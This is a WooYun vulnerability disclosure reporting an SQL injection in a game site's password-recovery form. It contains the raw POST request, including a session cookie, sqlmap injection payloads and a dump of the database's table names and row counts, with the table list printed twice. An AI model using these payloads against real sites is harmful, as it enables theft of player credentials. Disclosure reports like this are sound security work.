当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0191682

漏洞标题:ebogame主站post注入涉及402W万玩家信息(用户名/密码/支付密码等)

相关厂商:ebogame

漏洞作者: DeadSea

提交时间:2016-04-02 11:30

修复时间:2016-05-21 11:50

公开时间:2016-05-21 11:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-02: 细节已通知厂商并且等待厂商处理中
2016-04-06: 厂商已经确认,细节仅向厂商公开
2016-04-16: 细节向核心白帽子及相关领域专家公开
2016-04-26: 细节向普通白帽子公开
2016-05-06: 细节向实习白帽子公开
2016-05-21: 细节向公众公开

简要描述:

RT!

详细说明:

http://**.**.**.**/user_findpwd.php?t=email


POST http://**.**.**.**/user_findpwd.php?t=doemail HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/user_findpwd.php?t=email
Cookie: Hm_lvt_878250ef6d9058d8708994370fb5132c=1459546008; Hm_lpvt_878250ef6d9058d8708994370fb5132c=1459549499; PHPSESSID=144d2qapb7kfrshd3jdrgv1m76; bdshare_firstime=1459549345620; mrand=243969013; msign=e777f9591b90b0ec41549c14f3e2ea66; MemberName=chinasea; NickName=sea; MemberId=3945514; MemberPass=3d3e9afcb73af50299c8ff572daebb46; bmforumerboardidnum=219
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
data%5Bname%5D=1111&data%5Bemail%5D=111111111%**.**.**.**&sub=%E6%8F%90%E4%BA%A4

data%5Bname%5D参数存在注入

sqlmap identified the following injection point(s) with a total of 358 HTTP(s) r
equests:
---
Parameter: data[name] (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: data[name]=-1228' OR 5159=5159#&data[email]=111111111@**.**.**.**&sub=%E
6%8F%90%E4%BA%A4
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: data[name]=-5681' OR 1 GROUP BY CONCAT(0x71706a6b71,(SELECT (CASE W
HEN (3827=3827) THEN 1 ELSE 0 END)),0x716b767671,FLOOR(RAND(0)*2)) HAVING MIN(0)
#&data[email]=111111111@**.**.**.**&sub=%E6%8F%90%E4%BA%A4
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: data[name]=1111' AND (SELECT * FROM (SELECT(SLEEP(5)))XyKJ)#&data[e
mail]=111111111@**.**.**.**&sub=%E6%8F%90%E4%BA%A4
---
[06:38:13] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL 5.0.12


数据如下:

+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| ebogame_member_login              | 4026283 |
| ebogame_member                    | 2350328 |
| ebogame_activation                | 826836  |
| ebogame_member_integral           | 691708  |
| ebogame_charge_20160118           | 465322  |
| pre_ucenter_members               | 388347  |
| bbs_userlist                      | 340566  |
| ebogame_member_info               | 292054  |
| ebogame_member_serv               | 292044  |
| ebogame_member_char               | 241395  |
| ebogame_charge                    | 175353  |
| api_send_mail                     | 61235   |
| ebogame_advertising_click         | 52260   |
| pre_common_district               | 45051   |
| ebogame_charge_copy               | 43282   |
| ebogame_questions                 | 36047   |
| pre_forum_post                    | 27728   |
| ebogame_game_gift_code_17173      | 20000   |
| pre_home_notification             | 14236   |
| pre_common_credit_rule_log        | 13014   |
| pre_forum_thread                  | 12229   |
| pre_forum_threadpartake           | 10744   |
| pre_forum_threadmod               | 9011    |
| pre_common_member_count           | 8182    |
| pre_common_member_field_forum     | 8182    |
| pre_common_member_field_home      | 8182    |
| pre_common_member_profile         | 8182    |
| pre_common_member_status          | 8182    |
| pre_common_member                 | 8174    |
| pre_common_onlinetime             | 6443    |
| ebogame_game_code                 | 6210    |
| bbs_posts                         | 5157    |
| ebogame_game_gift_code            | 5000    |
| pre_forum_statlog                 | 4990    |
| pre_ucenter_memberfields          | 4811    |
| ebogame_member_price              | 3442    |
| ebogame_game_gift_code_           | 3000    |
| ebogame_content                   | 2640    |
| ebogame_extension_member          | 2591    |
| ebogame_news                      | 2288    |
| bbs_apclog                        | 2061    |
| ebogame_question_reply            | 1668    |
| pre_forum_attachment              | 1566    |
| pre_forum_pollvoter               | 1455    |
| bbs_actlogs                       | 1449    |
| pre_common_member_crime           | 1239    |
| pre_forum_modwork                 | 1003    |
| pre_common_stat                   | 899     |
| bbs_threads                       | 874     |
| pre_forum_thread_moderate         | 653     |
| ebogame_charge_heepay             | 591     |
| bbs_primsg                        | 517     |
| pre_common_member_action_log      | 496     |
| pre_ucenter_pm_indexes            | 419     |
| pre_forum_threadimage             | 405     |
| pre_common_setting                | 392     |
| ebogame_game_areas                | 358     |
| pre_forum_polloption              | 273     |
| pre_ucenter_pm_members            | 244     |
| pre_forum_attachment_1            | 222     |
| pre_forum_attachment_3            | 212     |
| pre_forum_attachment_4            | 180     |
| pre_forum_post_tableid            | 174     |
| pre_forum_attachment_9            | 168     |
| pre_forum_attachment_5            | 161     |
| sglj_extension                    | 154     |
| ebogame_advertising               | 151     |
| pre_ucenter_pm_lists              | 129     |
| pre_forum_attachment_7            | 124     |
| pre_common_tagitem                | 118     |
| bbs_ugoptlist                     | 115     |
| pre_ucenter_pm_messages_0         | 114     |
| pre_forum_threaddisablepos        | 110     |
| pre_forum_attachment_6            | 106     |
| pre_common_block_style            | 103     |
| pre_forum_attachment_unused       | 103     |
| pre_forum_attachment_0            | 102     |
| pre_forum_attachment_2            | 102     |
| pre_common_syscache               | 95      |
| pre_ucenter_notelist              | 90      |
| pre_common_smiley                 | 85      |
| pre_forum_attachment_8            | 85      |
| pre_forum_rsscache                | 80      |
| pre_ucenter_pm_messages_3         | 70      |
| pre_common_admincp_perm           | 67      |
| pre_common_member_profile_setting | 51      |
| pre_forum_poll                    | 49      |
| pre_ucenter_pm_messages_7         | 49      |
| pre_common_tag                    | 48      |
| pre_common_nav                    | 47      |
| pre_common_stylevar               | 45      |
| pre_ucenter_newpm                 | 40      |
| pre_forum_forumfield              | 38      |
| pre_forum_forum                   | 37      |
| pre_common_credit_log             | 36      |
| pre_ucenter_pm_messages_5         | 35      |
| ebogame_category                  | 33      |
| ebogame_price                     | 33      |
| pre_home_friend                   | 32      |
| pre_common_credit_rule            | 31      |
| pre_ucenter_pm_messages_2         | 31      |
| pre_home_friend_request           | 30      |
| pre_ucenter_pm_messages_6         | 29      |
| pre_ucenter_settings              | 26      |
| bbs_emoticons                     | 25      |
| ebogame_games                     | 25      |
| pre_ucenter_pm_messages_4         | 25      |
| bbs_search                        | 23      |
| pre_ucenter_pm_messages_8         | 23      |
| ebogame_extension_percent         | 22      |
| pre_ucenter_pm_messages_9         | 22      |
| ebogame_extension_settlemen       | 21      |
| pre_ucenter_pm_messages_1         | 21      |
| pre_common_cron                   | 18      |
| pre_common_usergroup              | 16      |
| pre_common_usergroup_field        | 16      |
| pre_home_friendlog                | 16      |
| bbs_forumdata                     | 15      |
| bbs_tags                          | 15      |
| pre_home_click                    | 15      |
| pre_common_report                 | 14      |
| pre_forum_threadclosed            | 14      |
| bbs_contacts                      | 13      |
| pre_forum_replycredit             | 13      |
| bbs_levels                        | 12      |
| pre_common_banned                 | 12      |
| pre_common_session                | 11      |
| pre_forum_poststick               | 11      |
| ebogame_game_gift_info_17173      | 10      |
| pre_forum_medal                   | 10      |
| ebogame_integral                  | 9       |
| pre_common_plugin                 | 9       |
| pre_home_favorite                 | 9       |
| bbs_usergroup                     | 8       |
| bbs_polls                         | 7       |
| pre_forum_warning                 | 7       |
| ebogame_extension                 | 6       |
| pre_common_pluginvar              | 6       |
| pre_forum_moderator               | 6       |
| pre_forum_typeoption              | 6       |
| pre_common_admincp_group          | 5       |
| pre_common_friendlink             | 5       |
| pre_common_admingroup             | 4       |
| pre_common_advertisement          | 4       |
| pre_forum_bbcode                  | 4       |
| pre_forum_onlinelist              | 4       |
| ebogame_game_gift_info_           | 3       |
| pre_common_admincp_member         | 3       |
| pre_common_failedlogin            | 3       |
| pre_forum_grouplevel              | 3       |
| pre_forum_imagetype               | 3       |
| pre_common_admincp_cmenu          | 2       |
| pre_common_block                  | 2       |
| pre_common_credit_rule_log_field  | 2       |
| pre_common_diy_data               | 2       |
| pre_common_patch                  | 2       |
| pre_common_regip                  | 2       |
| pre_common_template_block         | 2       |
| pre_common_word_type              | 2       |
| pre_home_poke                     | 2       |
| pre_home_pokearchive              | 2       |
| pre_mobile_setting                | 2       |
| bbs_favorites                     | 1       |
| bbs_lastest                       | 1       |
| pre_common_admincp_session        | 1       |
| pre_common_cache                  | 1       |
| pre_common_statuser               | 1       |
| pre_common_style                  | 1       |
| pre_common_template               | 1       |
| pre_ucenter_admins                | 1       |
| pre_ucenter_applications          | 1       |
| pre_ucenter_failedlogins          | 1       |
+-----------------------------------+---------+

漏洞证明:

+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| ebogame_member_login              | 4026283 |
| ebogame_member                    | 2350328 |
| ebogame_activation                | 826836  |
| ebogame_member_integral           | 691708  |
| ebogame_charge_20160118           | 465322  |
| pre_ucenter_members               | 388347  |
| bbs_userlist                      | 340566  |
| ebogame_member_info               | 292054  |
| ebogame_member_serv               | 292044  |
| ebogame_member_char               | 241395  |
| ebogame_charge                    | 175353  |
| api_send_mail                     | 61235   |
| ebogame_advertising_click         | 52260   |
| pre_common_district               | 45051   |
| ebogame_charge_copy               | 43282   |
| ebogame_questions                 | 36047   |
| pre_forum_post                    | 27728   |
| ebogame_game_gift_code_17173      | 20000   |
| pre_home_notification             | 14236   |
| pre_common_credit_rule_log        | 13014   |
| pre_forum_thread                  | 12229   |
| pre_forum_threadpartake           | 10744   |
| pre_forum_threadmod               | 9011    |
| pre_common_member_count           | 8182    |
| pre_common_member_field_forum     | 8182    |
| pre_common_member_field_home      | 8182    |
| pre_common_member_profile         | 8182    |
| pre_common_member_status          | 8182    |
| pre_common_member                 | 8174    |
| pre_common_onlinetime             | 6443    |
| ebogame_game_code                 | 6210    |
| bbs_posts                         | 5157    |
| ebogame_game_gift_code            | 5000    |
| pre_forum_statlog                 | 4990    |
| pre_ucenter_memberfields          | 4811    |
| ebogame_member_price              | 3442    |
| ebogame_game_gift_code_           | 3000    |
| ebogame_content                   | 2640    |
| ebogame_extension_member          | 2591    |
| ebogame_news                      | 2288    |
| bbs_apclog                        | 2061    |
| ebogame_question_reply            | 1668    |
| pre_forum_attachment              | 1566    |
| pre_forum_pollvoter               | 1455    |
| bbs_actlogs                       | 1449    |
| pre_common_member_crime           | 1239    |
| pre_forum_modwork                 | 1003    |
| pre_common_stat                   | 899     |
| bbs_threads                       | 874     |
| pre_forum_thread_moderate         | 653     |
| ebogame_charge_heepay             | 591     |
| bbs_primsg                        | 517     |
| pre_common_member_action_log      | 496     |
| pre_ucenter_pm_indexes            | 419     |
| pre_forum_threadimage             | 405     |
| pre_common_setting                | 392     |
| ebogame_game_areas                | 358     |
| pre_forum_polloption              | 273     |
| pre_ucenter_pm_members            | 244     |
| pre_forum_attachment_1            | 222     |
| pre_forum_attachment_3            | 212     |
| pre_forum_attachment_4            | 180     |
| pre_forum_post_tableid            | 174     |
| pre_forum_attachment_9            | 168     |
| pre_forum_attachment_5            | 161     |
| sglj_extension                    | 154     |
| ebogame_advertising               | 151     |
| pre_ucenter_pm_lists              | 129     |
| pre_forum_attachment_7            | 124     |
| pre_common_tagitem                | 118     |
| bbs_ugoptlist                     | 115     |
| pre_ucenter_pm_messages_0         | 114     |
| pre_forum_threaddisablepos        | 110     |
| pre_forum_attachment_6            | 106     |
| pre_common_block_style            | 103     |
| pre_forum_attachment_unused       | 103     |
| pre_forum_attachment_0            | 102     |
| pre_forum_attachment_2            | 102     |
| pre_common_syscache               | 95      |
| pre_ucenter_notelist              | 90      |
| pre_common_smiley                 | 85      |
| pre_forum_attachment_8            | 85      |
| pre_forum_rsscache                | 80      |
| pre_ucenter_pm_messages_3         | 70      |
| pre_common_admincp_perm           | 67      |
| pre_common_member_profile_setting | 51      |
| pre_forum_poll                    | 49      |
| pre_ucenter_pm_messages_7         | 49      |
| pre_common_tag                    | 48      |
| pre_common_nav                    | 47      |
| pre_common_stylevar               | 45      |
| pre_ucenter_newpm                 | 40      |
| pre_forum_forumfield              | 38      |
| pre_forum_forum                   | 37      |
| pre_common_credit_log             | 36      |
| pre_ucenter_pm_messages_5         | 35      |
| ebogame_category                  | 33      |
| ebogame_price                     | 33      |
| pre_home_friend                   | 32      |
| pre_common_credit_rule            | 31      |
| pre_ucenter_pm_messages_2         | 31      |
| pre_home_friend_request           | 30      |
| pre_ucenter_pm_messages_6         | 29      |
| pre_ucenter_settings              | 26      |
| bbs_emoticons                     | 25      |
| ebogame_games                     | 25      |
| pre_ucenter_pm_messages_4         | 25      |
| bbs_search                        | 23      |
| pre_ucenter_pm_messages_8         | 23      |
| ebogame_extension_percent         | 22      |
| pre_ucenter_pm_messages_9         | 22      |
| ebogame_extension_settlemen       | 21      |
| pre_ucenter_pm_messages_1         | 21      |
| pre_common_cron                   | 18      |
| pre_common_usergroup              | 16      |
| pre_common_usergroup_field        | 16      |
| pre_home_friendlog                | 16      |
| bbs_forumdata                     | 15      |
| bbs_tags                          | 15      |
| pre_home_click                    | 15      |
| pre_common_report                 | 14      |
| pre_forum_threadclosed            | 14      |
| bbs_contacts                      | 13      |
| pre_forum_replycredit             | 13      |
| bbs_levels                        | 12      |
| pre_common_banned                 | 12      |
| pre_common_session                | 11      |
| pre_forum_poststick               | 11      |
| ebogame_game_gift_info_17173      | 10      |
| pre_forum_medal                   | 10      |
| ebogame_integral                  | 9       |
| pre_common_plugin                 | 9       |
| pre_home_favorite                 | 9       |
| bbs_usergroup                     | 8       |
| bbs_polls                         | 7       |
| pre_forum_warning                 | 7       |
| ebogame_extension                 | 6       |
| pre_common_pluginvar              | 6       |
| pre_forum_moderator               | 6       |
| pre_forum_typeoption              | 6       |
| pre_common_admincp_group          | 5       |
| pre_common_friendlink             | 5       |
| pre_common_admingroup             | 4       |
| pre_common_advertisement          | 4       |
| pre_forum_bbcode                  | 4       |
| pre_forum_onlinelist              | 4       |
| ebogame_game_gift_info_           | 3       |
| pre_common_admincp_member         | 3       |
| pre_common_failedlogin            | 3       |
| pre_forum_grouplevel              | 3       |
| pre_forum_imagetype               | 3       |
| pre_common_admincp_cmenu          | 2       |
| pre_common_block                  | 2       |
| pre_common_credit_rule_log_field  | 2       |
| pre_common_diy_data               | 2       |
| pre_common_patch                  | 2       |
| pre_common_regip                  | 2       |
| pre_common_template_block         | 2       |
| pre_common_word_type              | 2       |
| pre_home_poke                     | 2       |
| pre_home_pokearchive              | 2       |
| pre_mobile_setting                | 2       |
| bbs_favorites                     | 1       |
| bbs_lastest                       | 1       |
| pre_common_admincp_session        | 1       |
| pre_common_cache                  | 1       |
| pre_common_statuser               | 1       |
| pre_common_style                  | 1       |
| pre_common_template               | 1       |
| pre_ucenter_admins                | 1       |
| pre_ucenter_applications          | 1       |
| pre_ucenter_failedlogins          | 1       |
+-----------------------------------+---------+

修复方案:

版权声明:转载请注明来源 DeadSea@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-04-06 11:41

厂商回复:

CNVD未直接复现所述情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无

漏洞评价:

评价

  1. 2016-04-03 00:01 | ActOr ( 实习白帽子 | Rank:54 漏洞数:5 | 人稳不言,水深不语。)

    这个站已经被日翻了~

  2. 2016-04-03 18:45 | 小龙 ( 普通白帽子 | Rank:2465 漏洞数:501 | 我就问,还有谁!!!!!!!!!!!!!...)

    @ActOr 我已经看到群里有人在卖了~。~

  3. 2016-04-03 20:16 | ActOr ( 实习白帽子 | Rank:54 漏洞数:5 | 人稳不言,水深不语。)

    @小龙 ebogame和5ebo的库是分开的。这个没用,5ebo还有个网游暗黑之光 - -